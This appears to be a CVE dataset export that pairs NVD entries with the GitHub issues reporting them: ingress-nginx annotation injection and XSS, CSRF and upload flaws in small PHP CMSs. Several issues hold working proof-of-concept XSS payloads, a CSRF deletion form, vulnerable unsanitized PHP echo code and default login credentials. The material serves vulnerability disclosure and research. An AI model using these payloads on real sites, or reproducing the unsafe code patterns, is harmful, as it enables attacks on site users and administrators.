cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2023-5044
2023-10-25T20:15:18.187
Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.7, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2023/10/25/3" }, { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Mitigation", "Vendor Advisory" ], "url": "https://github.com/kubernetes/ingress-nginx/issues/10572" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Mitigation" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/ukuYYvRNel0" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20240307-0012/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2023/10/25/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Vendor Advisory" ], "url": "https://github.com/kubernetes/ingress-nginx/issues/10572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Mitigation" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/ukuYYvRNel0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20240307-0012/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*", "matchCriteriaId": "B1FAA6D4-954E-4E5F-AB9A-61E1A3F9CD9B", "versionEndExcluding": "1.9.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/kubernetes/ingress-nginx/issues/10572
[ "Issue Tracking", "Mitigation", "Vendor Advisory" ]
github.com
[ "kubernetes", "ingress-nginx" ]
### Issue Details A security issue was identified in [ingress-nginx](https://github.com/kubernetes/ingress-nginx) where the nginx.ingress.kubernetes.io/permanent-redirect annotation on an Ingress object (in the `networking.k8s.io` or `extensions` API group) can be used to inject arbitrary commands, and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster. This issue has been rated **High** ([CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L)), and assigned **CVE-2023-5044**. ### Affected Components and Configurations This bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running `kubectl get po -n ingress-nginx`. If you are running the “chrooted” ingress-nginx controller introduced in v1.2.0 (gcr.io/k8s-staging-ingress-nginx/controller-chroot), command execution is possible but credential extraction is not, so the High severity does not apply. Multi-tenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue. #### Affected Versions - <v1.9.0 #### Versions allowing mitigation - v1.9.0 ### Mitigation Ingress Administrators should set the --enable-annotation-validation flag to enforce restrictions on the contents of ingress-nginx annotation fields. ### Detection If you find evidence that this vulnerability has been exploited, please contact [security@kubernetes.io](mailto:security@kubernetes.io) ### Additional Details See ingress-nginx Issue [#10572](https://github.com/kubernetes/kubernetes/issues/126817) for more details. ### Acknowledgements This vulnerability was reported by Jan-Otto Kröpke (Cloudeteer GmbH) Thank You, CJ Cullen on behalf of the Kubernetes Security Response Committee
CVE-2023-5044: Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation
https://api.github.com/repos/kubernetes/kubernetes/issues/126817/comments
15
2023-10-25T15:48:28Z
2024-08-20T13:24:56Z
https://github.com/kubernetes/kubernetes/issues/126817
2,475,634,462
126,817
5,694
CVE-2023-5793
2023-10-26T18:15:08.817
A vulnerability was found in flusity CMS and classified as problematic. This issue affects the function loadCustomBlocCreateForm of the file /core/tools/customblock.php of the component Dashboard. The manipulation of the argument customblock_place leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 81252bc764e1de2422e79e36194bba1289e7a0a5. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-243599.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/flusity/flusity-CMS/commit/81252bc764e1de2422e79e36194bba1289e7a0a5" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/flusity/flusity-CMS/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.243599" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.243599" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/flusity/flusity-CMS/commit/81252bc764e1de2422e79e36194bba1289e7a0a5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/flusity/flusity-CMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.243599" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.243599" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fluisity:fluisity:*:*:*:*:*:*:*:*", "matchCriteriaId": "93C33CF6-8C36-4B0D-B551-B9CAB1C59219", "versionEndExcluding": "2023-10-24", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/flusity/flusity-CMS/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "flusity", "flusity-CMS" ]
After installation, log in to the backend using the default account password tester/1234 ![de54a801af30a62252c8c0649f8397e](https://github.com/flusity/flusity-CMS/assets/113713406/1fabe5d5-d7d7-4297-9932-8e564e8894cc) Select block ![e3b1a788af0f2b176401ca2fbcc72fd](https://github.com/flusity/flusity-CMS/assets/113713406/7d7daeaf-7ccb-44d0-b486-3c028daa6b53) Use burpsuite to capture packets.Enter payload ![d7132f67311d0aee4c3a4bfccf62ef0](https://github.com/flusity/flusity-CMS/assets/113713406/2044c449-dc2b-4654-824f-b0e68487019e) Execution results ![01bc0f694a575827e320d2256e8c37b](https://github.com/flusity/flusity-CMS/assets/113713406/8776530a-16ce-47ad-a171-99609d05d229) ![a744716864dd8906b5cd7eabc11a055](https://github.com/flusity/flusity-CMS/assets/113713406/d1232dd7-1e86-4fa4-a67e-1a62fd1a4cee) payload:`?customblock_place=1');</script><script>alert('1` source code /core/tools/customblock.php ``` if (isset($_GET['customblock_place'])) { $customblock_place = $_GET['customblock_place']; echo "<script>loadCustomBlocCreateForm('$customblock_place');</script>"; } ```
Customblock in customblock.php_ XSS (Cross Site Scripting) exists for the place parameter
https://api.github.com/repos/flusity/flusity-CMS/issues/1/comments
2
2023-10-23T07:43:56Z
2024-04-19T02:35:15Z
https://github.com/flusity/flusity-CMS/issues/1
1,956,552,703
1
5,695
CVE-2023-42188
2023-10-27T00:15:09.287
IceCMS v2.0.1 is vulnerable to Cross Site Request Forgery (CSRF).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Thecosy/IceCMS/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://topdayplus.github.io/2023/10/27/CVE-deatail/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Thecosy/IceCMS/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://topdayplus.github.io/2023/10/27/CVE-deatail/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:macwk:icecms:2.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "C8043F07-E915-49DC-A4D8-DC34AC2B9770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/Thecosy/IceCMS/issues/17
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "Thecosy", "IceCMS" ]
After the administrator open the following page, and click the the Submit request, square message with ID 264 will be deleted. ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.146.129:8181/square/DelectSquareById/264"> <input type="submit" value="Submit request" /> </form> </body> </html> ```
There is a CSRF vulnerability that can delete the message
https://api.github.com/repos/Thecosy/IceCMS/issues/17/comments
0
2023-08-30T14:50:03Z
2023-08-30T14:50:03Z
https://github.com/Thecosy/IceCMS/issues/17
1,873,843,313
17
5,696
CVE-2023-46505
2023-10-27T01:15:32.267
Cross Site Scripting vulnerability in FanCMS v.1.0.0 allows an attacker to execute arbitrary code via the content1 parameter in the demo.php file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/PwnCYN/FanCMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/PwnCYN/FanCMS/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pwncyn:fancms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BA9EC6F1-F8D8-4020-A0F9-41A1BE75592F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/PwnCYN/FanCMS/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "PwnCYN", "FanCMS" ]
**Software Address:** https://down.chinaz.com/soft/38522.htm **Product Name:** FanCMS **Affect version:** Version 1.0.0 **Vulnerability Type:** Cross Site Scripting **Description:** Navigate to the/themes/static/kindeditor-4.1.7/php --/demo. php file. The content1 parameter was not filtered. <img width="499" alt="1" src="https://github.com/PwnCYN/FanCMS/assets/147542481/38ac5b4d-8a9f-4b61-b0e2-031413456291"> <img width="429" alt="2" src="https://github.com/PwnCYN/FanCMS/assets/147542481/9cc7d020-3025-4feb-a0f1-88e7cc0dd74a"> JavaScript statements can be executed directly, leading to XSS vulnerabilities. ![3](https://github.com/PwnCYN/FanCMS/assets/147542481/045c19e3-47a5-42a9-b097-daf054c92454)
FanCMS vulnerability testing
https://api.github.com/repos/PwnCYN/FanCMS/issues/1/comments
0
2023-10-20T13:05:45Z
2023-10-20T13:05:45Z
https://github.com/PwnCYN/FanCMS/issues/1
1,954,255,666
1
5,697
CVE-2023-5810
2023-10-27T01:15:32.317
A vulnerability, which was classified as problematic, has been found in flusity CMS. This issue affects the function loadPostAddForm of the file core/tools/posts.php. The manipulation of the argument edit_post_id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier of the patch is 6943991c62ed87c7a57989a0cb7077316127def8. It is recommended to apply a patch to fix this issue. The identifier VDB-243641 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "NONE", "baseScore": 3.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.4, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.4, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/flusity/flusity-CMS/commit/6943991c62ed87c7a57989a0cb7077316127def8" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/flusity/flusity-CMS/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.243641" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.243641" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/flusity/flusity-CMS/commit/6943991c62ed87c7a57989a0cb7077316127def8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/flusity/flusity-CMS/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.243641" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.243641" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flusity:flusity:*:*:*:*:*:*:*:*", "matchCriteriaId": "9989CEDF-D8FF-40B5-8E62-E4ABECFDBADC", "versionEndExcluding": "2023-10-24", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/flusity/flusity-CMS/issues/2
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "flusity", "flusity-CMS" ]
After installation, log in to the backend using the default account password tester/1234 select posts ![image](https://github.com/flusity/flusity-CMS/assets/113713406/f5b40b5c-fd5b-4b35-99e3-2d5305974934) enter payload `?edit_post_id=3);</script><script>alert(1024)</script>` ![image](https://github.com/flusity/flusity-CMS/assets/113713406/2445c0a4-1cf0-4533-a7bd-bad1f5a9d050) execution results ![image](https://github.com/flusity/flusity-CMS/assets/113713406/33adb1b1-31ee-4e9d-ba6d-13fee97753cf) Use burpsuite to capture packets. ![image](https://github.com/flusity/flusity-CMS/assets/113713406/d096f43e-7b1c-419c-8e20-0fb0781a3a86) ``` if (isset($_GET['edit_post_id'])) { $edit_post_id = $_GET['edit_post_id']; echo "<script>loadPostEditForm($edit_post_id);</script>"; } ``` The vulnerable code location is line 274 in core/tools/posts.php
edit_post_id in posts.php_ XSS (Cross Site Scripting) exists for the place parameter
https://api.github.com/repos/flusity/flusity-CMS/issues/2/comments
4
2023-10-24T10:36:35Z
2023-10-24T17:50:22Z
https://github.com/flusity/flusity-CMS/issues/2
1,958,967,105
2
5,698
CVE-2023-5811
2023-10-27T01:15:32.383
A vulnerability, which was classified as problematic, was found in flusity CMS. Affected is the function loadPostAddForm of the file core/tools/posts.php. The manipulation of the argument menu_id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as 6943991c62ed87c7a57989a0cb7077316127def8. It is recommended to apply a patch to fix this issue. VDB-243642 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "NONE", "baseScore": 3.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.4, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.4, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/flusity/flusity-CMS/commit/6943991c62ed87c7a57989a0cb7077316127def8" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flusity/flusity-CMS/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.243642" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.243642" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/flusity/flusity-CMS/commit/6943991c62ed87c7a57989a0cb7077316127def8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flusity/flusity-CMS/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.243642" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.243642" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flusity:flusity:*:*:*:*:*:*:*:*", "matchCriteriaId": "E9C3388B-D2C5-4EBE-9001-E438E4F263D6", "versionEndExcluding": null, "versionEndIncluding": "2.304", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/flusity/flusity-CMS/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flusity", "flusity-CMS" ]
After installation, log in to the backend using the default account password tester/1234 select posts ![image](https://github.com/flusity/flusity-CMS/assets/113713406/2eb0e2fd-fbb2-4908-a1c6-da576fd7695d) enter payload `?menu_id=3);</script><script>alert(1024)</script>` ![54991eddb621b877603d08a1349386d](https://github.com/flusity/flusity-CMS/assets/113713406/fd6235fc-b4e5-4a95-9bc8-86d8b3781249) execution results ![8b72fb909af799be53b08f707c901a7](https://github.com/flusity/flusity-CMS/assets/113713406/fc548da4-71f4-48cc-8bf6-2627671248b1) Use burpsuite to capture packets. ![d98c13e40c70796baa6e585570e381e](https://github.com/flusity/flusity-CMS/assets/113713406/dc5317de-d122-4efc-9379-f77cc8844fae) The vulnerable code location is line 274 in core/tools/posts.php ``` if (isset($_GET['menu_id'])) { $menu_id = $_GET['menu_id']; echo "<script>loadPostAddForm($menu_id);</script>"; } ```
menu_id in posts.php_ XSS (Cross Site Scripting) exists for the place parameter
https://api.github.com/repos/flusity/flusity-CMS/issues/3/comments
3
2023-10-24T10:40:44Z
2024-04-19T02:35:06Z
https://github.com/flusity/flusity-CMS/issues/3
1,958,975,399
3
5,699
CVE-2023-5812
2023-10-27T02:15:07.477
A vulnerability has been found in flusity CMS and classified as critical. Affected by this vulnerability is the function handleFileUpload of the file core/tools/upload.php. The manipulation of the argument uploaded_file leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-243643.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flusity/flusity-CMS/issues/4" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.243643" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.243643" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/flusity/flusity-CMS/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.243643" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.243643" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flusity:flusity:*:*:*:*:*:*:*:*", "matchCriteriaId": "E9C3388B-D2C5-4EBE-9001-E438E4F263D6", "versionEndExcluding": null, "versionEndIncluding": "2.304", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/flusity/flusity-CMS/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "flusity", "flusity-CMS" ]
